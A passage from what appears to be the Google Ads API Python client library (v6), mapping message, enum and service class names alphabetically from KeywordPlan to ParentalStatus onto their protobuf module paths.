"google.ads.google_ads.v6.proto.services.keyword_plan_campaign_service_pb2", "KeywordPlanCompetitionLevelEnum": "google.ads.google_ads.v6.proto.enums.keyword_plan_competition_level_pb2", "KeywordPlanErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_error_pb2", "KeywordPlanForecastIntervalEnum": "google.ads.google_ads.v6.proto.enums.keyword_plan_forecast_interval_pb2", "KeywordPlanForecastPeriod": "google.ads.google_ads.v6.proto.resources.keyword_plan_pb2", "KeywordPlanGeoTarget": "google.ads.google_ads.v6.proto.resources.keyword_plan_campaign_pb2", "KeywordPlanHistoricalMetrics": "google.ads.google_ads.v6.proto.common.keyword_plan_common_pb2", "KeywordPlanIdeaErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_idea_error_pb2", "KeywordPlanKeywordForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanKeywordHistoricalMetrics": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanMaxCpcBidForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanMaxCpcBidForecastCurve": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanNetworkEnum": "google.ads.google_ads.v6.proto.enums.keyword_plan_network_pb2", "KeywordPlanOperation": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanWeeklyForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanWeeklyTimeSeriesForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordSeed": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "KeywordView": "google.ads.google_ads.v6.proto.resources.keyword_view_pb2", "Label": "google.ads.google_ads.v6.proto.resources.label_pb2", "LabelErrorEnum": "google.ads.google_ads.v6.proto.errors.label_error_pb2", "LabelOperation": "google.ads.google_ads.v6.proto.services.label_service_pb2", "LabelStatusEnum": "google.ads.google_ads.v6.proto.enums.label_status_pb2", "LandingPageView": "google.ads.google_ads.v6.proto.resources.landing_page_view_pb2", "LanguageCodeErrorEnum": "google.ads.google_ads.v6.proto.errors.language_code_error_pb2", "LanguageConstant": "google.ads.google_ads.v6.proto.resources.language_constant_pb2", "LanguageInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "LeadFormAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "LeadFormCallToActionTypeEnum": "google.ads.google_ads.v6.proto.enums.lead_form_call_to_action_type_pb2", "LeadFormDeliveryMethod": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "LeadFormDesiredIntentEnum": "google.ads.google_ads.v6.proto.enums.lead_form_desired_intent_pb2", "LeadFormField": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "LeadFormFieldUserInputTypeEnum": "google.ads.google_ads.v6.proto.enums.lead_form_field_user_input_type_pb2", "LeadFormPostSubmitCallToActionTypeEnum": "google.ads.google_ads.v6.proto.enums.lead_form_post_submit_call_to_action_type_pb2", "LeadFormSingleChoiceAnswers": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "LegacyAppInstallAdAppStoreEnum": "google.ads.google_ads.v6.proto.enums.legacy_app_install_ad_app_store_pb2", "LegacyAppInstallAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "LegacyResponsiveDisplayAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "LinkedAccountTypeEnum": "google.ads.google_ads.v6.proto.enums.linked_account_type_pb2", "ListAccessibleCustomersRequest": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "ListAccessibleCustomersResponse": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "ListBatchJobResultsRequest": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "ListBatchJobResultsResponse": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "ListCampaignDraftAsyncErrorsRequest": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "ListCampaignDraftAsyncErrorsResponse": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "ListCampaignExperimentAsyncErrorsRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "ListCampaignExperimentAsyncErrorsResponse": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "ListInvoicesRequest": "google.ads.google_ads.v6.proto.services.invoice_service_pb2", "ListInvoicesResponse": "google.ads.google_ads.v6.proto.services.invoice_service_pb2", "ListMerchantCenterLinksRequest": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "ListMerchantCenterLinksResponse": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "ListOperationErrorEnum": "google.ads.google_ads.v6.proto.errors.list_operation_error_pb2", "ListPaymentsAccountsRequest": "google.ads.google_ads.v6.proto.services.payments_account_service_pb2", "ListPaymentsAccountsResponse": "google.ads.google_ads.v6.proto.services.payments_account_service_pb2", "ListPlannableLocationsRequest": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ListPlannableLocationsResponse": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ListPlannableProductsRequest": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ListPlannableProductsResponse": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ListingDimensionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ListingGroupInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ListingGroupTypeEnum": "google.ads.google_ads.v6.proto.enums.listing_group_type_pb2", "ListingScopeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "LocalAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "LocalPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.local_placeholder_field_pb2", "LocationExtensionTargetingCriterionFieldEnum": "google.ads.google_ads.v6.proto.enums.location_extension_targeting_criterion_field_pb2", "LocationFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "LocationGroupInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "LocationGroupRadiusUnitsEnum": "google.ads.google_ads.v6.proto.enums.location_group_radius_units_pb2", "LocationInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "LocationPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.location_placeholder_field_pb2", "LocationSourceTypeEnum": "google.ads.google_ads.v6.proto.enums.location_source_type_pb2", "LocationView": "google.ads.google_ads.v6.proto.resources.location_view_pb2", "LogicalUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "LogicalUserListOperandInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "ManagedPlacementView": "google.ads.google_ads.v6.proto.resources.managed_placement_view_pb2", "ManagerLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.manager_link_error_pb2", "ManagerLinkStatusEnum": "google.ads.google_ads.v6.proto.enums.manager_link_status_pb2", "ManualCpc": "google.ads.google_ads.v6.proto.common.bidding_pb2", "ManualCpm": "google.ads.google_ads.v6.proto.common.bidding_pb2", "ManualCpv": "google.ads.google_ads.v6.proto.common.bidding_pb2", "MatchingFunction": "google.ads.google_ads.v6.proto.common.matching_function_pb2", "MatchingFunctionContextTypeEnum": "google.ads.google_ads.v6.proto.enums.matching_function_context_type_pb2", "MatchingFunctionOperatorEnum": "google.ads.google_ads.v6.proto.enums.matching_function_operator_pb2", "MaximizeConversionValue": "google.ads.google_ads.v6.proto.common.bidding_pb2", "MaximizeConversions": "google.ads.google_ads.v6.proto.common.bidding_pb2", "MediaAudio": "google.ads.google_ads.v6.proto.resources.media_file_pb2", "MediaBundle": "google.ads.google_ads.v6.proto.resources.media_file_pb2", "MediaBundleAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "MediaBundleErrorEnum": "google.ads.google_ads.v6.proto.errors.media_bundle_error_pb2", "MediaFile": "google.ads.google_ads.v6.proto.resources.media_file_pb2", "MediaFileErrorEnum": "google.ads.google_ads.v6.proto.errors.media_file_error_pb2", "MediaFileOperation": "google.ads.google_ads.v6.proto.services.media_file_service_pb2", "MediaImage": "google.ads.google_ads.v6.proto.resources.media_file_pb2", "MediaTypeEnum": "google.ads.google_ads.v6.proto.enums.media_type_pb2", "MediaUploadErrorEnum": "google.ads.google_ads.v6.proto.errors.media_upload_error_pb2", "MediaVideo": "google.ads.google_ads.v6.proto.resources.media_file_pb2", "MerchantCenterLink": "google.ads.google_ads.v6.proto.resources.merchant_center_link_pb2", "MerchantCenterLinkOperation": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "MerchantCenterLinkStatusEnum": "google.ads.google_ads.v6.proto.enums.merchant_center_link_status_pb2", "MessagePlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.message_placeholder_field_pb2", "Metrics": "google.ads.google_ads.v6.proto.common.metrics_pb2", "MimeTypeEnum": "google.ads.google_ads.v6.proto.enums.mime_type_pb2", "MinuteOfHourEnum": "google.ads.google_ads.v6.proto.enums.minute_of_hour_pb2", "MobileAppCategoryConstant": "google.ads.google_ads.v6.proto.resources.mobile_app_category_constant_pb2", "MobileAppCategoryInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "MobileAppVendorEnum": "google.ads.google_ads.v6.proto.enums.mobile_app_vendor_pb2", "MobileApplicationInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "MobileDeviceConstant": "google.ads.google_ads.v6.proto.resources.mobile_device_constant_pb2", "MobileDeviceInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "MobileDeviceTypeEnum": "google.ads.google_ads.v6.proto.enums.mobile_device_type_pb2", "Money": "google.ads.google_ads.v6.proto.common.feed_common_pb2", "MonthOfYearEnum": "google.ads.google_ads.v6.proto.enums.month_of_year_pb2", "MonthlySearchVolume": "google.ads.google_ads.v6.proto.common.keyword_plan_common_pb2", "MoveManagerLinkRequest": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "MoveManagerLinkResponse": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "MultiplierErrorEnum": "google.ads.google_ads.v6.proto.errors.multiplier_error_pb2", "MutateAccountBudgetProposalRequest": "google.ads.google_ads.v6.proto.services.account_budget_proposal_service_pb2", "MutateAccountBudgetProposalResponse": "google.ads.google_ads.v6.proto.services.account_budget_proposal_service_pb2", "MutateAccountBudgetProposalResult": "google.ads.google_ads.v6.proto.services.account_budget_proposal_service_pb2", "MutateAccountLinkRequest": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "MutateAccountLinkResponse": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "MutateAccountLinkResult": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "MutateAdGroupAdLabelResult": "google.ads.google_ads.v6.proto.services.ad_group_ad_label_service_pb2", "MutateAdGroupAdLabelsRequest": "google.ads.google_ads.v6.proto.services.ad_group_ad_label_service_pb2", "MutateAdGroupAdLabelsResponse": "google.ads.google_ads.v6.proto.services.ad_group_ad_label_service_pb2", "MutateAdGroupAdResult": "google.ads.google_ads.v6.proto.services.ad_group_ad_service_pb2", "MutateAdGroupAdsRequest": "google.ads.google_ads.v6.proto.services.ad_group_ad_service_pb2", "MutateAdGroupAdsResponse": "google.ads.google_ads.v6.proto.services.ad_group_ad_service_pb2", "MutateAdGroupBidModifierResult": "google.ads.google_ads.v6.proto.services.ad_group_bid_modifier_service_pb2", "MutateAdGroupBidModifiersRequest": "google.ads.google_ads.v6.proto.services.ad_group_bid_modifier_service_pb2", "MutateAdGroupBidModifiersResponse": "google.ads.google_ads.v6.proto.services.ad_group_bid_modifier_service_pb2", "MutateAdGroupCriteriaRequest": "google.ads.google_ads.v6.proto.services.ad_group_criterion_service_pb2", "MutateAdGroupCriteriaResponse": "google.ads.google_ads.v6.proto.services.ad_group_criterion_service_pb2", "MutateAdGroupCriterionLabelResult": "google.ads.google_ads.v6.proto.services.ad_group_criterion_label_service_pb2", "MutateAdGroupCriterionLabelsRequest": "google.ads.google_ads.v6.proto.services.ad_group_criterion_label_service_pb2", "MutateAdGroupCriterionLabelsResponse": "google.ads.google_ads.v6.proto.services.ad_group_criterion_label_service_pb2", "MutateAdGroupCriterionResult": "google.ads.google_ads.v6.proto.services.ad_group_criterion_service_pb2", "MutateAdGroupExtensionSettingResult": "google.ads.google_ads.v6.proto.services.ad_group_extension_setting_service_pb2", "MutateAdGroupExtensionSettingsRequest": "google.ads.google_ads.v6.proto.services.ad_group_extension_setting_service_pb2", "MutateAdGroupExtensionSettingsResponse": "google.ads.google_ads.v6.proto.services.ad_group_extension_setting_service_pb2", "MutateAdGroupFeedResult": "google.ads.google_ads.v6.proto.services.ad_group_feed_service_pb2", "MutateAdGroupFeedsRequest": "google.ads.google_ads.v6.proto.services.ad_group_feed_service_pb2", "MutateAdGroupFeedsResponse": "google.ads.google_ads.v6.proto.services.ad_group_feed_service_pb2", "MutateAdGroupLabelResult": "google.ads.google_ads.v6.proto.services.ad_group_label_service_pb2", "MutateAdGroupLabelsRequest": "google.ads.google_ads.v6.proto.services.ad_group_label_service_pb2", "MutateAdGroupLabelsResponse": "google.ads.google_ads.v6.proto.services.ad_group_label_service_pb2", "MutateAdGroupResult": "google.ads.google_ads.v6.proto.services.ad_group_service_pb2", "MutateAdGroupsRequest": "google.ads.google_ads.v6.proto.services.ad_group_service_pb2", "MutateAdGroupsResponse": "google.ads.google_ads.v6.proto.services.ad_group_service_pb2", "MutateAdParameterResult": "google.ads.google_ads.v6.proto.services.ad_parameter_service_pb2", "MutateAdParametersRequest": "google.ads.google_ads.v6.proto.services.ad_parameter_service_pb2", "MutateAdParametersResponse": "google.ads.google_ads.v6.proto.services.ad_parameter_service_pb2", "MutateAdResult": "google.ads.google_ads.v6.proto.services.ad_service_pb2", "MutateAdsRequest": "google.ads.google_ads.v6.proto.services.ad_service_pb2", "MutateAdsResponse": "google.ads.google_ads.v6.proto.services.ad_service_pb2", "MutateAssetResult": "google.ads.google_ads.v6.proto.services.asset_service_pb2", "MutateAssetsRequest": "google.ads.google_ads.v6.proto.services.asset_service_pb2", "MutateAssetsResponse": "google.ads.google_ads.v6.proto.services.asset_service_pb2", "MutateBatchJobRequest": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "MutateBatchJobResponse": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "MutateBatchJobResult": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "MutateBiddingStrategiesRequest": "google.ads.google_ads.v6.proto.services.bidding_strategy_service_pb2", "MutateBiddingStrategiesResponse": "google.ads.google_ads.v6.proto.services.bidding_strategy_service_pb2", "MutateBiddingStrategyResult": "google.ads.google_ads.v6.proto.services.bidding_strategy_service_pb2", "MutateBillingSetupRequest": "google.ads.google_ads.v6.proto.services.billing_setup_service_pb2", "MutateBillingSetupResponse": "google.ads.google_ads.v6.proto.services.billing_setup_service_pb2", "MutateBillingSetupResult": "google.ads.google_ads.v6.proto.services.billing_setup_service_pb2", "MutateCampaignAssetResult": "google.ads.google_ads.v6.proto.services.campaign_asset_service_pb2", "MutateCampaignAssetsRequest": "google.ads.google_ads.v6.proto.services.campaign_asset_service_pb2", "MutateCampaignAssetsResponse": "google.ads.google_ads.v6.proto.services.campaign_asset_service_pb2", "MutateCampaignBidModifierResult": "google.ads.google_ads.v6.proto.services.campaign_bid_modifier_service_pb2", "MutateCampaignBidModifiersRequest": "google.ads.google_ads.v6.proto.services.campaign_bid_modifier_service_pb2", "MutateCampaignBidModifiersResponse": "google.ads.google_ads.v6.proto.services.campaign_bid_modifier_service_pb2", "MutateCampaignBudgetResult": "google.ads.google_ads.v6.proto.services.campaign_budget_service_pb2", "MutateCampaignBudgetsRequest": "google.ads.google_ads.v6.proto.services.campaign_budget_service_pb2", "MutateCampaignBudgetsResponse": "google.ads.google_ads.v6.proto.services.campaign_budget_service_pb2", "MutateCampaignCriteriaRequest": "google.ads.google_ads.v6.proto.services.campaign_criterion_service_pb2", "MutateCampaignCriteriaResponse": "google.ads.google_ads.v6.proto.services.campaign_criterion_service_pb2", "MutateCampaignCriterionResult": "google.ads.google_ads.v6.proto.services.campaign_criterion_service_pb2", "MutateCampaignDraftResult": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "MutateCampaignDraftsRequest": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "MutateCampaignDraftsResponse": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "MutateCampaignExperimentResult": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "MutateCampaignExperimentsRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "MutateCampaignExperimentsResponse": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "MutateCampaignExtensionSettingResult": "google.ads.google_ads.v6.proto.services.campaign_extension_setting_service_pb2", "MutateCampaignExtensionSettingsRequest": "google.ads.google_ads.v6.proto.services.campaign_extension_setting_service_pb2", "MutateCampaignExtensionSettingsResponse": "google.ads.google_ads.v6.proto.services.campaign_extension_setting_service_pb2", "MutateCampaignFeedResult": "google.ads.google_ads.v6.proto.services.campaign_feed_service_pb2", "MutateCampaignFeedsRequest": "google.ads.google_ads.v6.proto.services.campaign_feed_service_pb2", "MutateCampaignFeedsResponse": "google.ads.google_ads.v6.proto.services.campaign_feed_service_pb2", "MutateCampaignLabelResult": "google.ads.google_ads.v6.proto.services.campaign_label_service_pb2", "MutateCampaignLabelsRequest": "google.ads.google_ads.v6.proto.services.campaign_label_service_pb2", "MutateCampaignLabelsResponse": "google.ads.google_ads.v6.proto.services.campaign_label_service_pb2", "MutateCampaignResult": "google.ads.google_ads.v6.proto.services.campaign_service_pb2", "MutateCampaignSharedSetResult": "google.ads.google_ads.v6.proto.services.campaign_shared_set_service_pb2", "MutateCampaignSharedSetsRequest": "google.ads.google_ads.v6.proto.services.campaign_shared_set_service_pb2", "MutateCampaignSharedSetsResponse": "google.ads.google_ads.v6.proto.services.campaign_shared_set_service_pb2", "MutateCampaignsRequest": "google.ads.google_ads.v6.proto.services.campaign_service_pb2", "MutateCampaignsResponse": "google.ads.google_ads.v6.proto.services.campaign_service_pb2", "MutateConversionActionResult": "google.ads.google_ads.v6.proto.services.conversion_action_service_pb2", "MutateConversionActionsRequest": "google.ads.google_ads.v6.proto.services.conversion_action_service_pb2", "MutateConversionActionsResponse": "google.ads.google_ads.v6.proto.services.conversion_action_service_pb2", "MutateCustomAudienceResult": "google.ads.google_ads.v6.proto.services.custom_audience_service_pb2", "MutateCustomAudiencesRequest": "google.ads.google_ads.v6.proto.services.custom_audience_service_pb2", "MutateCustomAudiencesResponse": "google.ads.google_ads.v6.proto.services.custom_audience_service_pb2", "MutateCustomInterestResult": "google.ads.google_ads.v6.proto.services.custom_interest_service_pb2", "MutateCustomInterestsRequest": "google.ads.google_ads.v6.proto.services.custom_interest_service_pb2", "MutateCustomInterestsResponse": "google.ads.google_ads.v6.proto.services.custom_interest_service_pb2", "MutateCustomerClientLinkRequest": "google.ads.google_ads.v6.proto.services.customer_client_link_service_pb2", "MutateCustomerClientLinkResponse": "google.ads.google_ads.v6.proto.services.customer_client_link_service_pb2", "MutateCustomerClientLinkResult": "google.ads.google_ads.v6.proto.services.customer_client_link_service_pb2", "MutateCustomerExtensionSettingResult": "google.ads.google_ads.v6.proto.services.customer_extension_setting_service_pb2", "MutateCustomerExtensionSettingsRequest": "google.ads.google_ads.v6.proto.services.customer_extension_setting_service_pb2", "MutateCustomerExtensionSettingsResponse": "google.ads.google_ads.v6.proto.services.customer_extension_setting_service_pb2", "MutateCustomerFeedResult": "google.ads.google_ads.v6.proto.services.customer_feed_service_pb2", "MutateCustomerFeedsRequest": "google.ads.google_ads.v6.proto.services.customer_feed_service_pb2", "MutateCustomerFeedsResponse": "google.ads.google_ads.v6.proto.services.customer_feed_service_pb2", "MutateCustomerLabelResult": "google.ads.google_ads.v6.proto.services.customer_label_service_pb2", "MutateCustomerLabelsRequest": "google.ads.google_ads.v6.proto.services.customer_label_service_pb2", "MutateCustomerLabelsResponse": "google.ads.google_ads.v6.proto.services.customer_label_service_pb2", "MutateCustomerManagerLinkRequest": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "MutateCustomerManagerLinkResponse": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "MutateCustomerManagerLinkResult": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "MutateCustomerNegativeCriteriaRequest": "google.ads.google_ads.v6.proto.services.customer_negative_criterion_service_pb2", "MutateCustomerNegativeCriteriaResponse": "google.ads.google_ads.v6.proto.services.customer_negative_criterion_service_pb2", "MutateCustomerNegativeCriteriaResult": "google.ads.google_ads.v6.proto.services.customer_negative_criterion_service_pb2", "MutateCustomerRequest": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "MutateCustomerResponse": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "MutateCustomerResult": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "MutateCustomerUserAccessInvitationRequest": "google.ads.google_ads.v6.proto.services.customer_user_access_invitation_service_pb2", "MutateCustomerUserAccessInvitationResponse": "google.ads.google_ads.v6.proto.services.customer_user_access_invitation_service_pb2", "MutateCustomerUserAccessInvitationResult": "google.ads.google_ads.v6.proto.services.customer_user_access_invitation_service_pb2", "MutateCustomerUserAccessRequest": "google.ads.google_ads.v6.proto.services.customer_user_access_service_pb2", "MutateCustomerUserAccessResponse": "google.ads.google_ads.v6.proto.services.customer_user_access_service_pb2", "MutateCustomerUserAccessResult": "google.ads.google_ads.v6.proto.services.customer_user_access_service_pb2", "MutateErrorEnum": "google.ads.google_ads.v6.proto.errors.mutate_error_pb2", "MutateExtensionFeedItemResult": "google.ads.google_ads.v6.proto.services.extension_feed_item_service_pb2", "MutateExtensionFeedItemsRequest": "google.ads.google_ads.v6.proto.services.extension_feed_item_service_pb2", "MutateExtensionFeedItemsResponse": "google.ads.google_ads.v6.proto.services.extension_feed_item_service_pb2", "MutateFeedItemResult": "google.ads.google_ads.v6.proto.services.feed_item_service_pb2", "MutateFeedItemSetLinkResult": "google.ads.google_ads.v6.proto.services.feed_item_set_link_service_pb2", "MutateFeedItemSetLinksRequest": "google.ads.google_ads.v6.proto.services.feed_item_set_link_service_pb2", "MutateFeedItemSetLinksResponse": "google.ads.google_ads.v6.proto.services.feed_item_set_link_service_pb2", "MutateFeedItemSetResult": "google.ads.google_ads.v6.proto.services.feed_item_set_service_pb2", "MutateFeedItemSetsRequest": "google.ads.google_ads.v6.proto.services.feed_item_set_service_pb2", "MutateFeedItemSetsResponse": "google.ads.google_ads.v6.proto.services.feed_item_set_service_pb2", "MutateFeedItemTargetResult": "google.ads.google_ads.v6.proto.services.feed_item_target_service_pb2", "MutateFeedItemTargetsRequest": "google.ads.google_ads.v6.proto.services.feed_item_target_service_pb2", "MutateFeedItemTargetsResponse": "google.ads.google_ads.v6.proto.services.feed_item_target_service_pb2", "MutateFeedItemsRequest": "google.ads.google_ads.v6.proto.services.feed_item_service_pb2", "MutateFeedItemsResponse": "google.ads.google_ads.v6.proto.services.feed_item_service_pb2", "MutateFeedMappingResult": "google.ads.google_ads.v6.proto.services.feed_mapping_service_pb2", "MutateFeedMappingsRequest": "google.ads.google_ads.v6.proto.services.feed_mapping_service_pb2", "MutateFeedMappingsResponse": "google.ads.google_ads.v6.proto.services.feed_mapping_service_pb2", "MutateFeedResult": "google.ads.google_ads.v6.proto.services.feed_service_pb2", "MutateFeedsRequest": "google.ads.google_ads.v6.proto.services.feed_service_pb2", "MutateFeedsResponse": "google.ads.google_ads.v6.proto.services.feed_service_pb2", "MutateGoogleAdsRequest": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "MutateGoogleAdsResponse": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "MutateKeywordPlanAdGroupKeywordResult": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_keyword_service_pb2", "MutateKeywordPlanAdGroupKeywordsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_keyword_service_pb2", "MutateKeywordPlanAdGroupKeywordsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_keyword_service_pb2", "MutateKeywordPlanAdGroupResult": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_service_pb2", "MutateKeywordPlanAdGroupsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_service_pb2", "MutateKeywordPlanAdGroupsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_service_pb2", "MutateKeywordPlanCampaignKeywordResult": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_keyword_service_pb2", "MutateKeywordPlanCampaignKeywordsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_keyword_service_pb2", "MutateKeywordPlanCampaignKeywordsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_keyword_service_pb2", "MutateKeywordPlanCampaignResult": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_service_pb2", "MutateKeywordPlanCampaignsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_service_pb2", "MutateKeywordPlanCampaignsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_service_pb2", "MutateKeywordPlansRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "MutateKeywordPlansResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "MutateKeywordPlansResult": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "MutateLabelResult": "google.ads.google_ads.v6.proto.services.label_service_pb2", "MutateLabelsRequest": "google.ads.google_ads.v6.proto.services.label_service_pb2", "MutateLabelsResponse": "google.ads.google_ads.v6.proto.services.label_service_pb2", "MutateMediaFileResult": "google.ads.google_ads.v6.proto.services.media_file_service_pb2", "MutateMediaFilesRequest": "google.ads.google_ads.v6.proto.services.media_file_service_pb2", "MutateMediaFilesResponse": "google.ads.google_ads.v6.proto.services.media_file_service_pb2", "MutateMerchantCenterLinkRequest": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "MutateMerchantCenterLinkResponse": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "MutateMerchantCenterLinkResult": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "MutateOperation": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "MutateOperationResponse": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "MutateRemarketingActionResult": "google.ads.google_ads.v6.proto.services.remarketing_action_service_pb2", "MutateRemarketingActionsRequest": "google.ads.google_ads.v6.proto.services.remarketing_action_service_pb2", "MutateRemarketingActionsResponse": "google.ads.google_ads.v6.proto.services.remarketing_action_service_pb2", "MutateSharedCriteriaRequest": "google.ads.google_ads.v6.proto.services.shared_criterion_service_pb2", "MutateSharedCriteriaResponse": "google.ads.google_ads.v6.proto.services.shared_criterion_service_pb2", "MutateSharedCriterionResult": "google.ads.google_ads.v6.proto.services.shared_criterion_service_pb2", "MutateSharedSetResult": "google.ads.google_ads.v6.proto.services.shared_set_service_pb2", "MutateSharedSetsRequest": "google.ads.google_ads.v6.proto.services.shared_set_service_pb2", "MutateSharedSetsResponse": "google.ads.google_ads.v6.proto.services.shared_set_service_pb2", "MutateUserListResult": "google.ads.google_ads.v6.proto.services.user_list_service_pb2", "MutateUserListsRequest": "google.ads.google_ads.v6.proto.services.user_list_service_pb2", "MutateUserListsResponse": "google.ads.google_ads.v6.proto.services.user_list_service_pb2", "NegativeGeoTargetTypeEnum": "google.ads.google_ads.v6.proto.enums.negative_geo_target_type_pb2", "NewResourceCreationErrorEnum": "google.ads.google_ads.v6.proto.errors.new_resource_creation_error_pb2", "NotAllowlistedErrorEnum": "google.ads.google_ads.v6.proto.errors.not_allowlisted_error_pb2", "NotEmptyErrorEnum": "google.ads.google_ads.v6.proto.errors.not_empty_error_pb2", "NullErrorEnum": "google.ads.google_ads.v6.proto.errors.null_error_pb2", "OfflineUserAddressInfo": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "OfflineUserDataJob": "google.ads.google_ads.v6.proto.resources.offline_user_data_job_pb2", "OfflineUserDataJobErrorEnum": "google.ads.google_ads.v6.proto.errors.offline_user_data_job_error_pb2", "OfflineUserDataJobFailureReasonEnum": "google.ads.google_ads.v6.proto.enums.offline_user_data_job_failure_reason_pb2", "OfflineUserDataJobOperation": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "OfflineUserDataJobStatusEnum": "google.ads.google_ads.v6.proto.enums.offline_user_data_job_status_pb2", "OfflineUserDataJobTypeEnum": "google.ads.google_ads.v6.proto.enums.offline_user_data_job_type_pb2", "OnTargetAudienceMetrics": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "Operand": "google.ads.google_ads.v6.proto.common.matching_function_pb2", "OperatingSystemVersionConstant": "google.ads.google_ads.v6.proto.resources.operating_system_version_constant_pb2", "OperatingSystemVersionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "OperatingSystemVersionOperatorTypeEnum": "google.ads.google_ads.v6.proto.enums.operating_system_version_operator_type_pb2", "OperationAccessDeniedErrorEnum": "google.ads.google_ads.v6.proto.errors.operation_access_denied_error_pb2", "OperatorErrorEnum": "google.ads.google_ads.v6.proto.errors.operator_error_pb2", "OptimizationGoalTypeEnum": "google.ads.google_ads.v6.proto.enums.optimization_goal_type_pb2", "PaidOrganicSearchTermView": "google.ads.google_ads.v6.proto.resources.paid_organic_search_term_view_pb2", "ParentalStatusInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "ParentalStatusTypeEnum": 